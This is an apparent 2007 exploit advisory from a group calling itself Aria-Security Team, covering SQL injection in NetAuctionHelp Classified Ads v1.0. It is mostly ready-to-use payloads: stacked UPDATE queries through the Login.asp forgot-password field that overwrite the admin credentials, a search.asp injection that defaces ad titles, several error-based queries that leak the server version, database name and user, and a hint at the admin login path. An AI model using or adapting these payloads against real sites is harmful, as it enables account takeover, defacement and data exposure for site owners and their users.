NetAuctionHelp Classified Ads v1.0 SQL Injection

Type securityvulns
Reporter Securityvulns
Modified 2007-11-25T00:00:00


Aria-Security Team http://Aria-Security.Net

Original Advisory @ Try it online @

needed tables: tblMember.login tblMember.pswd

Vulnarable Page: Login.asp Run this query for Forget Password -1' UPDATE tblMember Set login= 'admin' where(id='1');-- -1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--

there it is, admin with the password hacked

these may help the attacker to get more info in the search.asp page

/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection],tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,,tblAd.state,tblAd.startdate'

example: -1' update tblAd set title= 'hacked' where(id='1');-- will say HACKED.

1' or 1=convert(int,@@version)-- 1' or 1=convert(int,@@servername)-- 1' or 1=convert(int,db_name())-- 1' or 1=convert(int,user_name())-- 1' or 1=convert(int,system_user)--

hint: /auctionAdmin/admLogin.asp ;)

Greetz: AurA Credits goes to Aria-Security Team Regards, The-0utl4w